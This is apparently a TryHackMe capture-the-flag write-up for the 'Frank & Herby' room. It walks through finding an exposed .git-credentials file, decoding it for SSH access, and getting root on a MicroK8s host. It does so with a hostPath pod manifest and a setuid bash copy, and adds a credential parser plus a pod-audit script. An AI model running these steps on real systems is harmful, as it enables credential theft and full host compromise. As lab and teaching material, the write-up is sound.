“The only true wisdom is in knowing you know nothing.” - Socrates

Frank & Herby – Medium

In this writeup we'll cover a great machine, Frank & Herby make an app, by kninja on TryHackMe.
Room: https://tryhackme.com/room/frankandherby

Summary

  • Nmap and rustscan found the following ports open:
    • 22
    • 3000
    • 10250
    • 10255
    • 10257
    • 10259
    • 16443
    • 25000
    • 31337
    • 32000
  • Most of the open ports relate to Kubernetes (the host runs MicroK8s).
  • Running GoBuster on ports 3000 and 31337, we found a .git-credentials file on port 31337.
    • Seclists' dirsearch list was used.
  • URL-encoded creds were found inside that file.
  • SSH to the host using the decoded creds.
  • Privilege escalation by creating a pod with the host filesystem mounted (MicroK8s).

Enumeration

  • Nmap and rustscan found the following ports open:
    • 22
    • 3000
    • 10250
    • 10255
    • 10257
    • 10259
    • 16443
    • 25000
    • 31337
    • 32000
  • Most of the open ports relate to Kubernetes, specifically a MicroK8s install: 10250 and 10255 are the kubelet API and its read-only port, 10257 and 10259 are kube-controller-manager and kube-scheduler, 16443 is the MicroK8s API server, 25000 is the MicroK8s cluster-agent and 32000 is the MicroK8s built-in container registry.
  • Running GoBuster on ports 3000 and 31337, we found a .git-credentials file on port 31337.
    • Seclists' dirsearch list was used.
  • This is git's credential-store file. Each line is a URL of the form scheme://user:password@host, and git percent-encodes the user name and password, so characters such as @, :, # and / show up as %40, %3A, %23 and %2F.
  • Since the credentials were URL encoded, we decoded them and used them to SSH to the host. This worked.
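Parsing a git credential-store file and recovering the percent-encoded secrets, as an added example that is not part of the original writeup. The file contents below are constructed sample data (the host names git.example.com and localhost:3000 and both passwords are made up); the room's real credentials are not reproduced.

```python
"""Parse a git credential-store file and decode the URL-encoded secrets.

Added example, not code from the original writeup. git's credential-store
writes one URL per line, scheme://user:password@host, with the user name and
password percent-encoded. A naive split on ':' or '@' breaks as soon as the
password contains those characters, so parse it as a URL and unquote.
"""
from urllib.parse import unquote, urlsplit

# Constructed sample file, not the room's real .git-credentials.
# The second password is Pa@ss#w0rd! once decoded.
SAMPLE_GIT_CREDENTIALS = """\
# comment lines and blank lines are ignored
https://alice:s3cret@git.example.com

https://frank:Pa%40ss%23w0rd%21@localhost:3000
"""


def parse_git_credentials(text):
    """Return [(scheme, host[:port], username, password), ...], decoded."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = urlsplit(line)
        if parts.username is None:
            continue  # a URL with no embedded credentials; nothing to take
        # urlsplit leaves the userinfo percent-encoded; decode it ourselves
        user = unquote(parts.username)
        password = unquote(parts.password or "")
        host = parts.hostname or ""
        if parts.port is not None:
            host = f"{host}:{parts.port}"
        entries.append((parts.scheme, host, user, password))
    return entries


if __name__ == "__main__":
    for scheme, host, user, password in parse_git_credentials(SAMPLE_GIT_CREDENTIALS):
        print(f"{scheme}://{host}  user={user!r}  password={password!r}")
```

Run it as-is to see the decoded pairs; point parse_git_credentials at the real file's contents to get the values to try over SSH.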
Privilege Escalation

  • Looking for ways to escalate privileges to root, we found the following:
    • sudo -l (No commands can be run as sudo)
    • find / -type f -perm -u=s 2>/dev/null (Nothing Suspicious)
    • getcap -r / 2>/dev/null (No capabilities that would allow privilege escalation)
    • frank was a member of the microk8s group.
      • Membership in that group gives access to the cluster's admin credentials, so microk8s.kubectl runs with full cluster-admin rights. On a single-node cluster that is effectively root on the host, because anyone who can create pods can mount the node's filesystem into one.
  • We listed the current pods using the following command:
    • microk8s.kubectl get pods
  • We then listed the deployments using the following command:
    • microk8s.kubectl get deployments -o wide
    • The image in use for the listed deployment was:
      • localhost:32000/bsnginx
      • It is served by the MicroK8s built-in registry on port 32000, so it can be reused for a new pod without pulling anything from the internet.
  • We then created a pod with the host's / mounted inside the container.
  • Process:
    • Create a file pod.yaml with the following contents:

        apiVersion: v1
        kind: Pod
        metadata:
          name: priv-esc
        spec:
          containers:
          - name: shell
            image: localhost:32000/bsnginx
            command:
              - "/bin/bash"
              - "-c"
              - "sleep 10000"
            volumeMounts:
              - name: root
                mountPath: /mnt/root
          volumes:
          - name: root
            hostPath:
              path: /
              type: Directory

    • Deploy pod using the file created above:
      • microk8s.kubectl apply -f pod.yaml
    • Check if the pod is running:
      • microk8s.kubectl get pods
    • Execute a shell on the newly created pod:
      • microk8s.kubectl exec -it priv-esc -- /bin/bash
    • Read the root.txt file:
      • cat /mnt/root/root/root.txt
    • One way to become root on the host is the following:
      • Inside the pod run:
        • cd /mnt/root
        • cp bin/bash home/frank/root_shell
        • chmod +xs home/frank/root_shell
      • On the host, run:
        • /home/frank/root_shell -p
      • Why this works: the pod has no securityContext, so the container runs as uid 0, and /mnt/root is a bind mount of the node's root filesystem. The copied binary is therefore the host's own /bin/bash, written to the host's disk owned by root with the setuid bit set. The -p flag stops bash from dropping the effective uid back to frank's when it starts.
      • Two things to check if it does not work: the copy must land on a filesystem that is not mounted nosuid (mount | grep home), and the pod must have been scheduled on the node you are logged into (always true on a single-node MicroK8s install; otherwise pin it with spec.nodeName).
      • Remove /home/frank/root_shell when done; it is a root setuid shell sitting in a user's home directory.
    • All Done! 😀
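The same escape pod built as a manifest in code, next to the check a cluster admin would run against any pod before admitting it, as an added example that is not part of the original writeup or of MicroK8s. The pod name, image, command and mount path are the writeup's; the audit rules are my own choice of the spec fields that let a pod reach the node (hostPath volumes, host namespaces, privileged containers, root users, dangerous added capabilities). kubectl apply accepts JSON as well as YAML, so the JSON this prints can be used in place of pod.yaml.

```python
"""Build the hostPath escape pod as a manifest and audit pod specs for it.

Added example, not code from the original writeup or from MicroK8s.
build_escape_pod() reproduces the writeup's pod.yaml as a dict;
audit_pod() is the defender's side: it lists the settings in a Pod that
amount to node access, so the same manifest can be checked before use.
"""
import json

# Values taken from the writeup's pod.yaml.
DEFAULT_NAME = "priv-esc"
DEFAULT_IMAGE = "localhost:32000/bsnginx"

# Capabilities that, if added, give a container a path to the node.
RISKY_CAPS = {"SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "NET_ADMIN", "ALL"}


def build_escape_pod(name=DEFAULT_NAME, image=DEFAULT_IMAGE,
                     host_path="/", mount_path="/mnt/root"):
    """Pod that bind-mounts the node's filesystem at mount_path.

    No securityContext is set, so the container runs as the image's default
    user (root for this image), and files it creates on the mount are root-owned.
    """
    return {
        "apiVersion": "v1",
        "kind": "Pod",
        "metadata": {"name": name},
        "spec": {
            "containers": [{
                "name": "shell",
                "image": image,
                "command": ["/bin/bash", "-c", "sleep 10000"],
                "volumeMounts": [{"name": "root", "mountPath": mount_path}],
            }],
            "volumes": [{"name": "root",
                         "hostPath": {"path": host_path, "type": "Directory"}}],
        },
    }


def audit_pod(pod):
    """Return a list of human-readable findings for node-escape risks."""
    findings = []
    spec = pod.get("spec", {})

    for key in ("hostPID", "hostIPC", "hostNetwork"):
        if spec.get(key):
            findings.append(f"warning: spec.{key} is enabled")

    for vol in spec.get("volumes", []):
        hp = vol.get("hostPath")
        if hp:
            path = hp.get("path", "")
            # mounting / hands over the whole node; anything else is still a risk
            sev = "critical" if path == "/" else "warning"
            findings.append(f"{sev}: volume {vol['name']!r} is hostPath {path!r}")

    pod_sc = spec.get("securityContext") or {}
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        sc = {**pod_sc, **(c.get("securityContext") or {})}  # container overrides pod
        if sc.get("privileged"):
            findings.append(f"critical: container {c['name']!r} is privileged")
        if not sc.get("runAsNonRoot") and sc.get("runAsUser", 0) == 0:
            findings.append(f"warning: container {c['name']!r} may run as root "
                            "(no runAsNonRoot or non-zero runAsUser)")
        for cap in (sc.get("capabilities") or {}).get("add", []):
            if cap in RISKY_CAPS:
                findings.append(f"critical: container {c['name']!r} adds {cap}")
    return findings


def to_manifest_json(pod):
    """Serialize for `microk8s.kubectl apply -f pod.json`."""
    return json.dumps(pod, indent=2)


if __name__ == "__main__":
    pod = build_escape_pod()
    print(to_manifest_json(pod))
    for finding in audit_pod(pod):
        print("FINDING:", finding)
```

The audit deliberately reports the hostPath mount of / and the missing runAsNonRoot separately: the mount alone exposes the node's files for reading, and it is the root user inside the container that turns that into root-owned setuid binaries on the host.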

Hope you enjoyed reading this writeup.
Happy Hunting! 😀

Posted by: infinity
